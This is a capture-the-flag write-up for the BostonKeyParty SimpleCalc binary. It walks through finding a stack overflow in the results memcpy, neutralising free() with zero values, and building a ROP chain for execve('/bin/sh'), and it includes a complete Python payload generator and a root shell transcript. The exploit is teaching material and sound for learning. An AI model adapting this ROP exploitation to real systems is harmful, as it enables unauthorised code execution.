BostonKeyParty CTF - SimpleCalc

Challenge materials can be found here: http://captf.com/2016/bostonkeyparty/02-simple/

So, initially we got a link to some file. Downloading it and running file on it gives:

calc: ELF 64-bit LSB  executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.24, BuildID[sha1]=3ca876069b2b8dc3f412c6205592a1d7523ba9ea, not stripped

So at this point we know that it’s a 64bit ELF binary and it’s statically linked.

I then ran checksec on it to see what protections were enabled.

Partial RELRO
No canary
found NX enabled
No PIE
No RPATH
No RUNPATH

So the only thing I had to worry about was NX being on. ie, the stack would be marked as non-executable so it wouldn’t be as trivial as somehow putting our shellcode there and returning into it.

However, earlier I found out that the binary was statically linked so hopefully I’d have access to a lot of useful ROP gadgets if I needed them.

Now that I had some initial information about the binary, I decided it was time to take a look at what it does.

I’m not going to describe this part in detail since it just involved me going through the different menu options and just playing with different values.

The interesting things I saw were that there was a minimum and maximum number of operations you could choose at the beginning.

There also seemed to be a restriction on the values you could use in the calculations. It complained when I entered small values and exited.

The last menu option “Save and Exit” also seemed interesting. What could this binary be trying to save? and to where?

Now it was time to look at the disassembly. I’m only going to include the interesting parts here:

From the disasembly of main:

0x00000000004013e9 <+102>: lea rax,[rbp-0x14] ; local var
0x00000000004013ed <+106>: mov rsi,rax ; int*
0x00000000004013f0 <+109>: mov edi,0x494214 ; %d
0x00000000004013f5 <+114>: mov eax,0x0
0x00000000004013fa <+119>: call 0x4084c0 <__isoc99_scanf>

Here we can see that it just reads an integer in via scanf after it asks for the number of calculations.

0x0000000000401409 <+134>: mov eax,DWORD PTR [rbp-0x14] ; num_calc
0x000000000040140c <+137>: cmp eax,0xff
0x0000000000401411 <+142>: jg 0x40141b <main+152> ; if num_calc > 255 then goto Failure
0x0000000000401413 <+144>: mov eax,DWORD PTR [rbp-0x14]
0x0000000000401416 <+147>: cmp eax,0x3 
0x0000000000401419 <+150>: jg 0x40142f <main+172>; if num_calc <= 3 continue to Failure

Failure:
0x000000000040141b <+152>: mov edi,0x4943f2
0x0000000000401420 <+157>: call 0x408de0 <puts>
0x0000000000401425 <+162>: mov eax,0x0
0x000000000040142a <+167>: jmp 0x401588 <main+517>
...
...
0x0000000000401588 <+517>: leave
0x0000000000401589 <+518>: ret

Essentially what this says is that 4 <= num_calc <= 255.

Next we see:

0x000000000040142f <+172>: mov eax,DWORD PTR [rbp-0x14]; num_calc
0x0000000000401432 <+175>: shl eax,0x2 ; num_calc * 4
0x0000000000401435 <+178>: cdqe ; convert to qword
0x0000000000401437 <+180>: mov rdi,rax ; 
0x000000000040143a <+183>: call 0x415050 <malloc> ; allocate num_calc*4 bytes

Here we can see that it allocates num_calc * 4 bytes where 4 bytes is the size of an integer. This definitely hints that the binary is storing the results of each calculation that we do. Let’s call the allocated memory, int *results;

Looking at the rest of it binary, it all seems very repetitive.

All of the operations are pretty much identical except for the instruction(s) for adding, subtracting, dividing and multiplying.

0x000000000040147c <+249>: call 0x401082 <adds> ; call operation function
0x0000000000401481 <+254>: mov eax,DWORD PTR [rbp-0x4] ; i where  0 <= i < num_calculations 
0x0000000000401484 <+257>: cdqe
0x0000000000401486 <+259>: lea rdx,[rax*4+0x0]; calculate offset into allocated memory
0x000000000040148e <+267>: mov rax,QWORD PTR [rbp-0x10] ; get base address of allocated memory
0x0000000000401492 <+271>: add rdx,rax ;
0x0000000000401495 <+274>: mov eax,DWORD PTR [rip+0x2c35ed] # 0x6c4a88 <add+8> ; get result stored in global variable
0x000000000040149b <+280>: mov DWORD PTR [rdx],eax ; store result at base+offset.

It goes like this:

Call operation function based on menu choice (add, substract, multiply, divide)
Calculate where to store memory. results + 4*i
Actually store result: [results + (4*i)] = result;

That takes care of menu options 1-4. Now to look at option 5 which was labelled “Save and Exit”.

0x000000000040152e <+427>: mov eax,DWORD PTR [rbp-0x14]
0x0000000000401531 <+430>: shl eax,0x2; num_calc * 4
0x0000000000401534 <+433>: movsxd rdx,eax ; num bytes to copy
0x0000000000401537 <+436>: mov rcx,QWORD PTR [rbp-0x10]; int *results
0x000000000040153b <+440>: lea rax,[rbp-0x40] ; destination address
0x000000000040153f <+444>: mov rsi,rcx
0x0000000000401542 <+447>: mov rdi,rax
0x0000000000401545 <+450>: call 0x4228d0 <memcpy> ; copy num_calc*4 bytes from results to the destination address
0x000000000040154a <+455>: mov rax,QWORD PTR [rbp-0x10]
0x000000000040154e <+459>: mov rdi,rax
0x0000000000401551 <+462>: call 0x4156d0 <free> ; attempt to free int *results
0x0000000000401556 <+467>: mov eax,0x0
0x000000000040155b <+472>: jmp 0x401588 <main+517>

Now things become very interesting. Here, the results from our calculations are being copied to a local variable inside of main.

However, the local variable is at rbp-0x40. That means that it is at most 64 bytes in length. However, we can copy num_calc * 4 bytes into it where num_calc can be as large as 255. Therefore we can copy up to 1024 bytes from our results to that location.

BUFFER OVERFLOW FOUND!!!

Given this information, we can calculate that we have to write 80 bytes in order to gain control over RIP. ie. 64 bytes + 8 bytes for the saved frame pointer + 8 bytes for the saved return address.

Let’s test this, keeping in mind that every calculation we do will count for 4 bytes. Therefore we need 20 calculations + 1 more for the save and exit.

root@184b8859c34f:/chall# perl -e 'print "21\n","1\n40\n40\n"x20,"5\n"' | ./calc
<Lots of output>
=> Segmentation fault (core dumped)

Looks good so far.

Let’s do this in GDB / inspect the dump to ensure that we actually have control over RIP.

root@184b8859c34f:/chall# perl -e 'print "21\n","1\n40\n40\n"x20,"5\n"' > input

root@184b8859c34f:/chall# gdb -q ./calc
Reading symbols from ./calc...(no debugging symbols found)...done.

gdb-peda$ run < input
Starting program: /chall/calc < input
<output>
=>
Program received signal SIGSEGV, Segmentation fault.

OH NO. Seems we don’t have control over RIP after all. After thinking about this for a minute, the problem becomes obvious. Remember our int *results from earlier? Since that was located at RBP-0x10, we’re clobbering the value when trying to overwrite the save return address.

Now, I was already familiar with how free() works at this point so I knew that clobbering results with a value of 0 would just cause free() to return and not cause a crash. However, it isn’t hard to deduce this from its disassembly either.

Dump of assembler code for function free:
0x00000000004156d0 <+0>: mov rax,QWORD PTR [rip+0x2ae079] # 0x6c3750 <__free_hook>
0x00000000004156d7 <+7>: test rax,rax
0x00000000004156da <+10>: jne 0x41579a <free+202> 
0x00000000004156e0 <+16>: test rdi,rdi ; x = rdi & rdi
0x00000000004156e3 <+19>: je 0x415798 <free+200> ; jump if x==0
...
...
0x0000000000415798 <+200>: repz ret

The only time test rdi, rdi would result in the ZF being set is if rdi was 0 initially. Therefore, free() exits if the argument passed to it is 0.

Armed with this knowledge, let’s try to get control over RIP again.

I used subtractions with 40 as both operands to get a value of 0 and I used that value repeated for the entire overflow.

root@184b8859c34f:/chall# perl -e 'print "21\n","2\n40\n40\n"x20,"5\n"' > input

root@184b8859c34f:/chall# gdb -q ./calc
Reading symbols from ./calc...(no debugging symbols found)...done.

gdb-peda$ run < input
Starting program: /chall/calc < input
=>
Program received signal SIGSEGV, Segmentation fault.

YAY. WE HAVE CONTROL OVER RIP.

Now that we have control over RIP, it’s time to pop a shell and read the flag. We want to use the execve (0x3b) syscall and we want to execute /bin/sh.

Knowing that NX is enabled, the stack isn’t executable and we’re going to have to use ROP.

int execve(const char *filename,const char *const argv[], const char *const envp[])

Goals:

execve("/bin/sh", NULL, NULL)

RDX = 0 : Let envp = NULL
RSI = 0 : Let argv = NULL
RDI = addr of “/bin/sh”
EAX = 0x3b : syscall number
SYSCALL Instruction

Making RDX = 0

Let’s try to set RDX first. When searching for ROP gadgets, a POP RDX; RET is available @ 0x00437a85. Let’s overwrite the saved return address with that.

Let’s picture our stack at the time of overflow right before ret has executed and we have control over RIP.

       |                               |
       |                               |
       |     0x00000000 ; NULL         | 
       |     0x00437a85 ; SAVED RET    |
RSP-->

Therefore, when ret executes, it’ll place 0x00437a85 into RIP and continue execution there. It will then POP RDX, placing the next value on the stack into RDX (in this case 0x00000000) and moving RSP higher up the stack. The RET instruction following it is then executed, but we haven’t decided what to return to yet. We can place the address that we want to return to right above 0x00000000.

MAKING RSI = 0

Since we’ve set RDX = 0, let’s set RSI = 0. Turns out there’s a POP RSI; RET at 0x00401c87.

       |     0x00000000 ; NULL          |
       |     0x00401c87 ; POP RSI; RET  |
RSP-->
       |     0x00000000 ; NULL          | 
       |     0x00437a85 ; POP RDX; RET  |

Therefore when the RET after POP RDX executes, it’ll then place 0x00401c87 into RIP. The POP RSI is then executed, making RSI = 0. The following RET instruction is then executed. What shall we return into next?

MAKING RDI = addr of “/bin/sh[NULL]"

This part ended up being a little more complicated than the others.

I could easily place /bin/sh[NULL] onto the stack. However, how would we get its address into RDI?

I looked for a gadget containing MOV RDI, RSP. At 0x00492468, there was a MOV RDI, RSP; CALL R12 gadget. This would have to do. As for placing /bin/sh[NULL] on the stack, it was important to keep in mind that Intel uses little endian so /bin/sh[NULL] which normally be 0x2f62696e2f736800 would be 0x0068732f6e69622f.

       |    0x0068732f6e69622f ; "/bin/sh[NULL]|
       |    0x00492468 ; MOV RDI,RSP; CALL R12 | 
RSP -> 
       |     0x00000000 ; NULL                 |
       |     0x00401c87 ; POP RSI; RET         |
       |     0x00000000 ; NULL                 | 
       |     0x00437a85 ; POP RDX; RET         |

Given that a CALL R12 was going to be executed, this means that I’d have to place the next address I wanted to jump to into R12 before we got to that point. I needed a POP R12; RET gadget and I found one at 0x00400493. It’s important to keep in mind that CALL causes the address of the next instruction to be pushed onto the stack as the saved return address, essentially subtracting 8 from RSP, which messes up our layout a little. In addition to that, we never executed a RET meaning that RSP is another additional 8 behind where we want it to be.

Therefore, we want the address in R12 to point to a sequence of instructions which increases RSP by 16. However, when searching for a ADD RSP, 0x10 ROP gadget, I couldn’t find one. However, I did find ADD RSP, 0x8; RET and ADD RSP, 0x18; RET gadgets.

I could use the first one twice or I could use the second one and just place 8 dummy bytes onto the stack. I chose the latter @ 0x00416af0.

       |    NEXT RETURN ADDRESS                |
       |    0x00000000 ; DUMMY BYTES           |
       |    0x0068732f6e69622f ; "/bin/sh[NULL]|
       |    0x00492468 ; MOV RDI,RSP; CALL R12 (clobbered) |  
RSP -> 
       |     0x00000000 ; NULL                 |
       |     0x00401c87 ; POP RSI; RET         |
       |     0x00000000 ; NULL                 | 
       |     0x00437a85 ; POP RDX; RET         |

I inserted the POP R12 gadget at the start.   
       |     0x00416af0 ; ADD RSP,0x18; RET    |   
       |     0x00400493 ; POP R12; RET         |

Finally we have RDI = addr of /bin/sh/[NULL] and our stack is in a usable state.

MAKING EAX = 0x3b

This was fairly simple. I found a POP RAX; RET gadget at 0x0044db34.

       |    NEXT RETURN ADDRESS                |
       |    0x0000003b ; execve syscall number |
       |    0x0044db34 ; POP RAX; RET          |
RSP->
       |    0x00000000 ; DUMMY BYTES           |
       |    0x0068732f6e69622f ; "/bin/sh[NULL]|
       |    0x00492468 ; MOV RDI,RSP; CALL R12 (clobbered) |   
       |    0x00000000 ; NULL                 |
       |    0x00401c87 ; POP RSI; RET         |
       |    0x00000000 ; NULL                 | 
       |    0x00437a85 ; POP RDX; RET         |
       |    0x00416af0 ; ADD RSP,0x18; RET    |   
       |    0x00400493 ; POP R12; RET         |

EXECUTING THE SYSCALL INSTRUCTION

At this point, we have everything set up perfectly. All we need to do now is execute the SYSCALL instruction and our ROP chain should be complete and this should be able to give us a shell.

Luckily for us, there are a lot of them, one being at 0x004648e5.

       |    0x004648e5 ; SYSCALL               |
       |    0x0000003b ; execve syscall number |
       |    0x0044db34 ; POP RAX; RET          |
       |    0x00000000 ; DUMMY BYTES           |
       |    0x0068732f6e69622f ; "/bin/sh[NULL]|
       |    0x00492468 ; MOV RDI,RSP; CALL R12 (clobbered) |   
       |    0x00000000 ; NULL                 |
       |    0x00401c87 ; POP RSI; RET         |
       |    0x00000000 ; NULL                 | 
       |    0x00437a85 ; POP RDX; RET         |
       |    0x00416af0 ; ADD RSP,0x18; RET    |   
       |    0x00400493 ; POP R12; RET         |

WOOHOO ROP CHAIN COMPLETE

Now by abusing the subtraction operation in my python script, I was able to generate a sequence of operations that would result in the stack looking like what we’ve created.

The script really is terrible and hacky :p Ignore that.

def erev(val):
	rev_val = []
	for i in range(0,len(val),2):
		rev_val = val[i:i+2] + rev_val
	return rev_val

def generate_input(val):
	if val[0:2] == "0x":
		val  = val[2:]

	val = val.zfill(16)

	val = list(val)
	rev_val = erev(val)

	first_half =  ''.join(erev(rev_val[0:8]))
	second_half = ''.join(erev(rev_val[8:]))

	first_half = int(first_half, 16)
	second_half = int(second_half, 16)

	print 2
	print first_half+40
	print 40

	print 2
	print second_half+40
	print 40


print 43 

for i in range(0,9):
	generate_input('00')

generate_input('0x000000400493') #pop r12; ret
generate_input('0x00416af0') # add rsp, 0x18; ret
generate_input('0x00437a85') # pop rdx; ret
generate_input('0000000000') # NULL
generate_input('0x000401c87') #pop rsi; ret
generate_input('0000000000')  # NULL
generate_input('0x00492468')  # mov rdi, rsp; call r12;
generate_input('0x0068732f6e69622f') # "<0>hs/nib/"
generate_input('00000000') #NULL
generate_input('0x0044db34') #pop rax; ret
generate_input('0x3b')  #59 (execve)
generate_input('0x004648e5') #syscall;ret

print 5

Let’s test it.

root@eb386f7913f0:/chall# python pwn.py > shell.txt
root@eb386f7913f0:/chall# cat shell.txt - | ./calc
<Lots of output>
=> whoami
root
echo "WOOHOO WE CAN READ THE FLAG NOW"
WOOHOO WE CAN READ THE FLAG NOW

And it works :D